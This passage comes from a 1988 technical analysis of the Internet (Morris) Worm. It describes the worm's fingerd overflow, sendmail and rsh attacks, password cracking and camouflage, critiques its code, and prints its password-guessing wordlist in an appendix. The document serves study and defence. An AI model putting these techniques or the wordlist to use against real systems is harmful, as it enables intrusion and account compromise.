This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\(using a UDP send on a TCP socket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2. sendw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sent the worm code over a connected TCP circu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machine. First it checked to make sure that th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held a copy of the l1.c code \(see Appendix B\). Ne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akemagic to get a local socket established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challenge string. Then, it encoded and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detailed previously in \2474-2a. Finally, i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hit and returned the result code of that routine.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hipped across the link were decrypted in memory firs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xorbuf and then re-encrypted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3. supports_r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determined if the target host, specifi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supported the BSD- derived rsh protocol. It did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socket and attempting a TCP connection to port 514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machine. A timeout or connect failure caused a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LSE; otherwise, the socket was closed and the retur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4. supports_tel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determined if a host was reachable and suppo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protocol \(i.e., was probably not a router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dumb'' box\). It was similar to supports_rsh in nat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established a socket, connected to the remote mach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23, and returned FALSE if an error or timeout occur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socket was closed and TRUE wa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5. try_finge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tried to establish a connection to a remote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emon on the given host by connecting to port 79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succeeded, it sent across an overfull buff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\2474-8b and waited to see if the other sid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ll. If so, it returned the file descriptors to the call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closed the socket and returned a failur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6. try_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called crypt with the password attempt and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against the encrypted password in the pwd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user. If a match was found, the unencrypted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pied into the pwd structure, and the routine attack_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7. try_r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reated two pipes and then forked a chil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process attempted to rexec a remote shell o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the parameters, using the specified user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Then the child process tried to invoke the rs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ttempting to run, in order, ``/usr/ucb/rsh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/usr/bin/rsh,'' and ``/bin/rsh.'' If the remot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ed, the function returned the file descriptors of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. Otherwise, it closed all file descriptors, killed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GKILL, and reaped it with a call to wait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8. try_send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attempted to establish a connection to the SMTP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#25\) on the remote host. If successful, it condu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explained in \2474-2b. It then called the waithi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 infection ``took.'' Return codes were check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was transmitted, and if a return code indic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routine aborted after sending a ``quit''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39. waith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cted as the bootstrap server for a vect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mote machine. It waited for up to 120 seco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created by the makemagic routine, and if no conne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t closed the socket and returned a failure code. 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thing received was not the challenge string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ootstrap program, the socket was closed and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The routine decrypted each object file using xorbu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it across the connection to the vector program \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\). Then a script was transmitted to compile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. This was described in \2474-4. If the remote ho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infected, the infected flag was set i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and the socket closed. Otherwise, the routine sent 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trings to delete each object file. The function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 or failure of the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40. xorb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as somewhat peculiar. It performed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/decryption function by XORing the buffer pas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with the first 10 bytes of the xorbuf routine it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would not work on a machine with a split I/D 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agged archite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alysis of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 Structure and Sty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ination of the reverse-engineered code of the w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ve. Although it is not the same as read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it does reveal some characteristics of the author\(s\)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that may surprise some people is that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mediocre, and might even be considered poo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here are places where calls are made to fun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o many or too few arguments. Many routines hav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hat are either never used, or are potenti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are initialized. In at least one location, a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as an argument rather than the address of the str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dead code, as routines that are never refere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code that cannot be executed because of condi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ver met \(possibly bugs\). It appears that the author\(s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used the lint utility on the program. At many pl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there are calls on system routines and the return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hecked for success. In many places, calls are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eap routine, malloc and the result is immediat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heck. Although the program was configur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core file or other evidence if a fatal failure occur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simple checks on the return codes is indica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ppiness; it also suggests that the code was written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nimal or no testing. It is certainly possible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were written into the code and elided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compilation flags. However, there would b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remove those checks from the productio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The structures chosen for some of the internal dat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vealing. Everything was represented as linked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All searches were done as linear pass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list. Some of these lists could get quite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less that considerable CPU time was spent by the wor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and searching these lists. A little extra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hash buckets or some form of sorted lists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little overhead to the program, yet made it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\(and thus quicker to infect other hosts and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to system watchers\). Linear lists may be easy to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ny experienced programmer or advanced CS studen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implement a hash table or lists of hash buck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difficulty. Some effort was duplicated in spot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was in the code that tried to break pass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password to an account had been found in a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execution, the worm would encrypt every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and attempt a match against it. Similar redundanc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in the code to construct the lists of hosts to in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ocations in the code where it appea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\(s\) meant to execute a particular function but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invocation. The use of the UDP send on a TCP socke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ring example. Another example is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ere the code sends a KILL signal to its par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rounding code gives strong indication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meant to do a killpg instead but used the wrong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ection of code that appears particularly well-thou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volves the crypt routines used to check passwords. A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noted in [Seel88], this code is nine times fas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Berkeley crypt function. Many interesting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de to the algorithm, and the routines do not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written by the same author as the rest of th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routines involved have some support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anddecryption\320even though only encry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the worm. This supports the assumption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as written by someone other than the author\(s\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included with this code. It would be intere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where this code originated and how it came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program. The program could have been much more virulen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\(s\) been more experienced or less rushed in her/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. However, it seems likely that this cod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over a long period of time, so the only conclu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awn is that the author\(s\) was sloppy or careless \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\), and perhaps that the release of the worm was prem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 Problems of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little argument that the program was functional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we all wish it had been less capable! However, we are lu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nse that the program had flaws that prevente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o the fullest. For instance, because of an err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ould fail to infect hosts on a local area network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might identify such hosts. Anothe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functionality concerns the gathering of host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. As noted already, the code failed to gather hos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user .rhosts files early on. It also did not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host names from other user and system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names \(e.g., /etc/hosts.lpd\). Many of the operation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one ``smarter.'' The case of using linear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ready been mentioned. Another example would have b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user passwords by the salt used. If the same sal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more than one password, then all those password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ecked in parallel as a single pass was mad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. On our machine, 5% of the 200 passwords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alts, for instance. No special advantage was tak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password was compromised. Once the root passwo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, it is possible to fork children that set their u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s to match each designated use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could then attempt the rsh attack described earl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. Instead, root is treated as any other accoun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uggested to me that this treatment of roo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conscious choice of the worm author\(s\). Without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 motivation of the author, this is impossible to dec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onsidering the design and intent of the program,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fficult to believe that such exploitation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if the author had thought of it. The same attack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ger daemon could have been extended to the Sun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but was not. The only explanations that come to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is was not done are that the author lacked the motiv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, the time, or the resources to develop a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n. However, at a recent meeting, Professor Rick Rash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egie-Mellon University was heard to claim that Robert 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, the alleged author of the worm, had revealed the fing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o system administrative staff at CMU well over a year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is report is correct and the worm author is indeed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is, it is obvious that there was sufficient time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n version of the code. In fact, I asked three Purdue grad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\(Shawn D. Ostermann, Steve J. Chapin, and Jim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oen to develop a Sun 3 version of the attack, and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n under three hours. The Worm author certainly must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Suns or else he would not have been able to provid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ies to accompany the operational worm. Motiv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 be a factor considering everything els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With time and resources available, the only reas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immediately rule out is that he lacked the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implement a Sun version of the attack. This seemsun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iven the inconsistent nature of the rest of the cod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a possibility. However, if this is the case, it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question: was the author of the Worm the original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X fingerd attack? Perhaps the most obvious shortcom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the lack of understanding about propagation and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the worm was spotted so quickly and caused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uption was because it replicated itself exponentially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, and because each worm carried no history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tedly, there was a check in place to see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as already infected, but one out of every seven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ver die even if there was an existing infe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orms marked for self-destruction woul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up to the point of having made at least one complete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assword file. Many approaches could have been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\(s\) to slow the growth of the worm or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estation; little is to be gained from explaining them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ir absence from the worm program is telling.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\(s\) did not have any understanding of how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pagate, or else she/he/they did not care; the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m of mechanisms to limit growth tends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lack of understanding rather than indifference.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s used by the Worm were reasonably clever.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is interesting to note: when trying passw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list, or when trying to break into connected hos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would randomize the list of candidates for trial. Thu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worm were present on the local machine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re likely to try candidates in a different order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ing their coverage. This implies, however \(as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f the pleasequit variable\) that the author\(s\)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y concerned with the presence of multiple worm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More to the point, multiple worms were allow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an effort to maximize the spread of the infec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pports the contention that the author did no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agation or load effects of the Worm. The de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program, the ``thinning'' protocol, and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tate machine were all clever and non-obvio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structure of the program, especially the cod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P addresses, indicates considerable knowledge of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outines available to support it. The knowledge evid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at code would indicate extensive experience with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This, coupled with some of the errors in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related to networking, further support the thes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was not a careful programmer\320the errors in thos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de were probably not errors because of ignor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. Camoufl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are was taken to prevent the worm program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. This can be seen by the caution with which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troduced into a machine, including the use of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. It can be seen by the fact that every string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worm was encrypted to prevent simple examination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d by the care with which files associated with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eleted from disk at the earliest opportuni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ntents were encrypted in memory when load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videnced by the continual forking of the proce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faulty\) check for other instances of the worm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. The code also evidences precautions against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itself to anyone seeking to stop the worm. It set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limits so it cannot dump a core file, and it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ata encrypted until used. Luckily, there a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obtaining core files and data images, and resear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ble to obtain all the information they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 and reverse-engineer the code. There is no dou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the author\(s\) of the worm intended to mak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as difficult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 Specific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re specific comments are worth making. These are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ular aspects of the code rather than the progra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1. The sendmail att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ites tend to experience substantial loads because of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raffic. This is especially true at sites with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s. Thus, the administrators at those si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heir mailers to queue incoming mail and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 periodically. The usual configuration is to set send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queue every 30 to 90 minutes. The attack through send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il on these machines unless the vector progra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into a nearly empty queue within 120 seconds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rocessed. The reason for this is that the infecting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nly wait on the server socket for two minut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ng the ``infecting mail.'' Thus, on systems with de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s, the vector process would not get built i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main worm program over to the target.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ould fail in its connection attempt and ex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zero status. Additionally, the attack through send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the vector program without a specific path.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invoked with ``foo'' instead of ``./foo'' a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hell-based attack. As a result, on system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th used by sendmail's shell did not conta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\(``.''\), the invocation of the code would fai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oted that such a failure interrupts the proces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commands \(such as the rm of the files\), and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hy many system administrators discovered copies of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urce code in their /usr/tmp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2. The machine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as already been noted, this attack was made only on Su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nd VAX machines running BSD UNIX.  It has been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t least one mailing list that had the Sun code been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mc68010 flag, more Sun machines would have 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im to the worm. It is a matter of some curiosity wh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ere not targeted for this attack. In particula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Pyramid, Sequent, Gould, Sun 4, and Sun i386 mach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inary files for those had also been included, the worm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read much further. As it was, some locations such as Oh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were completely spared the effects of the worm be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``known'' machines were of a type that the worm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. Since the author of the program knew how to brea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UNIX machines, it seems odd that he/she did not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the program on foreign architectures to inclu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.3. Portability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\(s\) of the worm may not have had much exper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portable UNIX code, including shell scripts.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the shell script used to compile the vec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is used: if [ -f sh ] The use of the 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s a synonym for the test function is not univer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users with experience writing portable shell files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out the operator test rather than rely on therebeing a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 named ``['' on any particular system. They als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est operator is built-in to many shells and thu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external [ variant. The test invocation used in the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lso uses the -f flag to test for presence of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.  This provided us with the worm ``condom'' published Thurs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directory with the name sh in /usr/tmp cau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o fail, as do later attempts to create executab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ame. Experienced shell programmers tend to use the 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exists\) flag in circumstances such as this, to detec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but sockets, devices, named FIFOs, etc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oquialisms are present in the code that bespeak a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riting portable code. One such example i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where file units are closed just after the vect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executing, and again in the main program just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executing. In both programs, code such as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: for \(i = 0; i &lt; 32; i++\) close\(i\); The portabl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lish the task of closing all file descriptors \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eley-derived systems\) is to execute: for \(i = 0; i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dtablesize\(\); i++\) close \(i\); or the even mor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(i = getdtablesize\(\)-1; i &gt;= 0; i--\) close\(i\)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number of file units available \(and thus open\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from system t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examples can be drawn from the code, but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bvious by now: the author of the worm program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moderately experienced UNIX programmer, but s/he was b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``UNIX Wizard'' many have been claiming.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s a few clever techniques and tricks, but there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if they are all the original work of the Worm auth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eems to be the product of an inexperienced or s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. The person \(or persons\) who pu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ppears to lack fundamental insight in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, data structures, and network propagation, b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has some very sophisticated knowledge of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facilities. The code does not appear to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\(although anything other than unit testing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o do\), or else it was prematurely released. Actu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hat both of these conclusions are corr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so much dead and duplicated code coup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some data structures \(such as the 20-slot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\) argues that the program was intended to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nclu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lear from the code that the worm was deliberately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wo things: infect as many machines as possible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track and stop. There can be no question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any way an accident, although its release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ature. It is still unknown if this worm, or a futu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, was to accomplish any other tasks. Although an auth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lleged \(Robert T. Morris\), he has not publicly conf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has the matter been definitively proven. Consi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f both civil and criminal legal actio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ssion and an explanation are unlikely to be forthcom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oon. Speculation has centered on motivations as diver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, pure intellectual curiosity, and a desire to i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. This must remain speculation for the time be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ince we do not have access to a definit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e author\(s\). At the least, there must be som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sychological makeup of someone who would build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have stated that the authors of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been ``computer geniuses'' of some sort.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by that supposition since first hearing it,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xamined the code in some depth, I am convince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not evidence to support any such claim. The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unfinished and done by someone clever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gifted, at least in the way we usually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alented programmers and designers. There were many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 in the code that would not be made by a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ent programmer. The code does not evidenc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good data structuring, algorithms, or ev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flaws in UNIX. It does contain clever exploi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pecific flaws in system utilities, but that is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of genius. In general, the code is not that impres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``success'' was probably due to a large amount of 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ny programming skill possessed by the author.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ed most of us, however. The effects of this worm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(largely\) benign, and it was easily stopped. Had the cod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and developed further by someone more experienced, o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en coupled with something destructive, the toll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nsiderably higher. I can easily think of several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could have written this program, and not only d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ar fewer \(if any\) errors, but made it considerab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lent. Thankfully, those individuals are all respon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professionals who would not consider such an act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earn from this about securing our systems will help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the only such incident we ever need to analyz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should also point out that we need a better mechanis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coordinate information about security flaws and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to this incident was largely ad hoc, and resu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uplication of effort and a failure to disseminat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sites that needed it. Many site administ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he problem from reading the newspaper or w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. The major sources of information for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affected seems to have been Usenet news group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I put together when the worm was first dis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useful, these methods did not ensure timely,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ion of useful information \320 especially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d on the Internet to work! Over three weeks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some sites are still not reconnected to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econd time in six months that a major panic ha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community.The first occurred in May when a ru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pt the community that a ``logic bomb'' had been planted in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y a disgruntled employee. Many, many sites turn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locks back or they shut off their system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. The personnel at Sun Microsystems responded to thi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ble fashion, conducting in-house testing to isol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reat, and issuing information to the community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l with the situation. Unfortunately, almost ever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have watched events unfold, glad that they we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who had to deal with the situation. The worm has show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re all affected by events in our shared environ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to develop better information methods outside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ext crisis. This whole episode should cause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 the ethics and laws concerning access to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ology we use has developed so quickly it is no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o determine where the proper boundaries of mor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. Many senior computer professionals started their care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go by breaking into computer systems at their colle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of employment to demonstrate their expertis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have changed and mastery of computer science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now involves a great deal more than can be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timate knowledge of the flaws in a particula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Entire businesses are now dependent, wisely or not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s. People's money, careers, and possibl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ves may be dependent on the undisturbed functio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As a society, we cannot afford the con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ning or encouraging behavior that threatens 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s. As professionals, computer scient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ngineers cannot afford to tolerate the romantic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er vandals and computer criminals. This inciden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mpt some discussion about distribution of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information. In particular, since hundreds of sit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captured'' the binary form of the worm, and since person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ites have utilities and knowledge that enabl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-engineer the worm code, we should ask how long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 beneficial to keep the code unpublished? As I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roduction, at least five independent group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reverse-engineered versions of the worm, and I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re have been done or will be attempted, especial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s are kept private. Even if none of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ublished in any formal way, hundreds of individual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ccess to a copy before the end of the year. Histor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ensure security of software through secrecy has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effective in the long term. It is vital that we edu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 and make bug fixes available to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ay that does not compromise their security. Metho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dissemination of information appear to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 to that goal. Last, it is important to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both the Internet and UNIX helped to defeat the w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spread it. The immediacy of communication,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ource and binary files from machine to machin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spread availability of both source and expertis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throughout the country to work together to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 even despite the widespread disconnection of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. Although the immediate reaction of some peop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restrict communication or promote a d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software options to prevent a recurrence of a w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entirely the wrong reaction.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to open communication or decreas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 access to in-depth information will not prev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attacker\320it will only decrease the po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and resources available to fight such an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such an attitude would be contrary to the whol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ving an open, research-oriented network. The Worm w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breakdown of ethics as well as lapses in security\32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ly technological attempt at prevention will not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roblem, and may just cause new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is analysis was performed on reverse-engine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worm code. The following people wer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 of those versions: Donald J. Becker of Ha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Keith Bostic of Berkeley, Donn Seele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Utah, Chris Torek of the University of Mary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Pare of FX Development, and the team at MIT: Mark W. Eich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ley R. Zanarotti, Bill Sommerfeld, Ted Y. Ts'o, Jon Rochl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Raeburn, Hal Birkeland and John T. Kohl. A dis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worm code was provided at Purdue by sta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due University Computing Center, Rich Kulawiec in partic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individuals who reviewed early drafts of this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ributed their advice and expertise: Don Becker, Ka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phy, Brian Kantor, R. J. Martin, Richard DeMill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Keith Bostic and Steve Bellovin. My thank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dividuals. My thanks and apologies to anyone who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credited and wa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m83. Allman, E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mail\320An Internetwork Mail Ro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Berkeley, 1983. Issued with the B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documentation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75. Brunner, John, The Shockwave Rider, Harper &amp; Row, 19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84. Cohen, Fred, ``Computer Viruses: The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s,'' PROCEEDINGS OF THE 7TH NATIONAL COMPUT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, pp. 240-263, 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88. Denning, Peter J., ``Computer Viruses,''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, vol. 76, pp. 236-238, May-June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wd85. Dewdney, A. K., ``A Core War Bestiary of viruses, w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threats to computer memories,'' SCIENTIFIC AMERI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252, no. 3, pp. 14-23, May 19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r72. Gerrold, David, When Harlie Was One, Ballentine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2. The first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84. Grampp, Fred. T. and Robert H. Morris, ``UNIX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ecurity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BELL LABORATORIES TECHNICAL JOURNAL, vol. 63, no. 8, part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. 1649-1672, Oct. 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77. Harrenstien, K., ``Name/Finger,'' RFC 742, SRI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enter, December 19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79. Morris, Robert and Ken Thompson, ``UNIX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'' COMMUNICATIONS OF THE ACM, vol. 22, no. 11, pp. 5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 ACM, November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82. Postel, Jonathan B., ``Simple Mail Transfer Protocol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C 821, SRI Network Information Center, August 19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d87. Reid, Brian, ``Reflections on Some Recent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reakins,'' COMMUNICATIONS OF THE ACM, vol. 30, no.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. 103-105, ACM, February 19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c79.Ritchie, Dennis M., ``On the Security of UNIX, '' in U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f IX nt 0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RY DOCUMENTS, AT &amp; T, 1979. Seel88. Seeley, Donn, ``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 of the Worm,'' TECHNICAL REPORT, Computer Science Dep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Utah, November 1988. Unpublish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82. Shoch, John F. and Jon A. Hupp, ``The Worm Programs \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Experience with a Distributed Computation,''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CM, vol. 25, no. 3, pp. 172-180, ACM, March 198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ix A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the mini-dictionary of word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. These were tried when attempting to break user pass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through this list is, in some sense reveal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raises a significant question: how was this list chos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umption has been expressed by many people that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words commonly used as passwords; this seems unlik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choices for passwords usually include fantasy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list contains none of the likely choices \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hobbit,'' ``dwarf,'' ``gandalf,'' ``skywalker,'' ``conan''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relatives and friends are often used, and we see wom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like ``jessica,'' ``caroline,'' and ``edwina,''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the common names ``jennifer'' or ``kathy.''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most no men's names such as ``thomas'' or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stephen'' or ``steven'' \(or ``eugene''!\). Additionally,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have the initial letters capitalized, although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ow they are used in passwords. Also of interest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bscene words in this dictionary, yet many rep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ted password cracking experiments have revealed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significant number of users who use such words \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\) as passwords. The list contains at least on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: ``commrades'' instead of ``comrades''; I als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``markus'' is a misspelling of ``marcus.'' Some of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ppear in standard dictionaries and are non-English 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jixian,'' ``vasant,'' ``puneet,'' etc. There are als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words in this list that I would not expec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common: ``anthropogenic,'' ``imbroglio,'' ``umesh,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rochester,'' ``fungible,'' ``cerulean,'' etc. I imag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was derived from some data gathering with a limite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sswords, probably in some known \(to the author\)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That is, some dictionary-based or brute-forc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ed to crack a selection of a few hundred password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a small set of machines. Other approaches to ga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could also have been used\320Ethernet monitors, Tro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login programs, etc. However they may have been cra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that were broken would then have been add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. Interestingly enough, many of these words are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on-line dictionary \(in /usr/dict/words\).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re useful as a supplement to the main diction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attack the worm used as strategy #4, but I would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be of limited use before that time. This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 might be useful in the deter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\(s\) of this code. One approach would be to find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user or local dictionary containing these words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o find some system\(s\) where a significant quant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could be broken with this list. aaa academia aerob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lane albany albatross albert alex alexander algebra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ama amorphous analog anchor andromache animal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ropogenic anvils anything aria ariadne arrow arthur ath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aztecs azure bacchus bailey banana bananas ban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barber baritone bass bassoon batman beater beauty beeth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ved benz beowulf berkeley berliner beryl beverly bicam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brenda brian bridget broadway bumbling burgess campan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or cardinal carmen carolina caroline cascades castle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uga celtics cerulean change charles charming charon ch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gar classic clusters coffee coke collins commrade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 cookie cooper cornelius couscous creation creosote cr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emon dancer daniel danny dave december defoe deluge des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dieter digital discovery disney dog drought duncan e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edges edinburgh edwin edwina egghead eiderdown eil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in elephant elizabeth ellenemeraldengine engi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enzyme ersatz establish estate euclid evely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way felicia fender fermat fidelity finite fishers fl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flower flowers foolproof football foresight format forsy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ier fred friend frighten fun fungible gabriel gard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field gauss george gertrude ginger glacier gnu golfer gorg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ges gosling gouge graham gryphon guestguitargumption gun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er hamlet handily happening harmony harold harvey heb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nlein hello help herbert hiawatha hibernia honey horse ho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tchins imbroglio imperial include ingres inna innoc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hman isis japan jessica jester jixian johnny joseph josh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th juggle julia kathleen kermit kernel kirkland knight la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bda lamination larkin larry lazaruslebesguelee leland le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is light lisa louis lynne macintosh mack maggot magic malco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markus marty marvin master maurice mellon merlin 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michelle mike minimum minsky moguls moose morley moz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napoleon nepenthe ness network newton next no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tion nyquist oceanography ocelot olivetti olivia oracle o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well osirisoutlawoxford pacific painless pakistan pam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atricia penguin peoria percolate persimmon persona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philip phoenix pierre pizza plover plymouth polynom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dering pork poster praise precious prelude prince prince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protozoa pumpkin puneet puppet rabbit rachmanin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raindrop raleigh random rascal really rebecca remote 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e robotics rochesterrolexromano ronald rosebud rose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s ruben rules ruth sal saxon scamper scheme scott sco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sensor serenity sharks sharon sheffield sheldon sh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vers shuttle signature simon simple singer single smile s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ch smother snatch snoopy soap socrates sossina sparrows s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springer squires strangle stratford stuttgart sub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summer supersuperstage support supported surfer suza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rer symmetry tangerine tape target tarragon taylor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ation thailand tiger toggle tomato topography tort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ota trails trivial trombone tubas tuttle umesh unhappy uni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urchin utility vasant vertigo vicky village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en water weenie whatnot whiting whitney will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burg willie winston wisconsinwizardwombat wood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wood yacov yang yellowstone yosemite zap zimmer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 The Vec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m was brought over to each machine it infect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of a small program I call the vector program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have been referring to this as the grappling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Some people have referred to it as the program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suffix used on each copy. The source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ransferred to the victim machine u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discussed in the paper. It would then be comp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on the victim machine with three command line arg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onical IP address of the infecting machine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CP port to connect to on that machine to get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orm files, and a magic number that effectively ac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-challenge password. If the ``server'' worm on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nd port did not receive the same magic number bac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transfer, it would immedi- ately disconn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program. This can only have been to prevent some-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``capture'' the binary files by spoofing a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server.'' This code also goes to some effort to hide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by zeroing out the argu- ment vector, and by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king a copy of itself. If a failure occurred in transfer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 code deleted all files it had already transfer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ted. One other key item to note in this cod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was designed to be able to transfer up to 20 files;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only three. This can only make one wonder if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version of the worm was planned for a later d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at version might have carried with it other comma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data, or possibly local virus or trojan hor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what follows is a pair of programs that I was unable to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ependabilit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D is an acronym for Berkeley Softwar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is a registered trademark of AT&amp;T Labora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 is a trademark of Digital Equipmen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edition of the book, just published,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updated'' to omit this subplot about  VIR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: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bably a coincidence that the Internet Worm was loo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, the eve of this ``birthday.'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widely used alternative to sendmail, MMDF,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as too complex and large by  many users. Furth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erceived to be as flexible as sendmail if i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special  addressing and handling rules when bri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erogeneous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speaking, the password is not encrypted. A block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is repeatedly encrypted using  the user passwor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is encryption is what is saved. See [Morr79]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list would likely include all words in the dictiona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of all such words, and a large  collection of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ec is a remote command execution service. It requir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/password combination be  suppli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compiled in as port number 23357, on host 127.0.0.1 \(loopback\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CP port 11357 on host 128.32.137.1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ly, although the program was coded to ge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st on the remote end of  point-to-point links,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have been made of that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some of them aren't suspicious enou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ars to be a bug. The probable assumption wa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hl would handle infection of local hosts, but hl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! Thus, local hosts were never infected via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uzzling. The appropriate file to scan f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s would have been the .rhosts file, not the .forwar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ommunication from someone present at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of a Sequent Symmetry or Gould NP1 inf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 of the worm presents an awesome \(and awful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The effects noticed locally when the worm brok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unloaded VAX 8800 were spectacular. The effec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with one or two orders of magnitude more capacit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Kevin Braunsdorf and Rich Kulawiec at Purdue PU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Adams, of the Center for Seismic Studies, has comme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y someday hear that the worm was loosed to impress Jo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ter. Without further information, this is as val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on as any other, and should raise further distur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; not everyone with access to computers is r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e, and future attacks may reflec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aper I have been writing author\(s\)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It occurs to me that most of the mail, Usenet po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dia coverage of this incident have assumed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\(singular\). Are we so unaccustomed to working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ograms that this is our natural inclination? Or is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nd it hard to believe that more than one individual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ch poor judgement? I also noted that most of peop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 with seemed to assume that the worm author was ma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it to others to speculate on the value, if any,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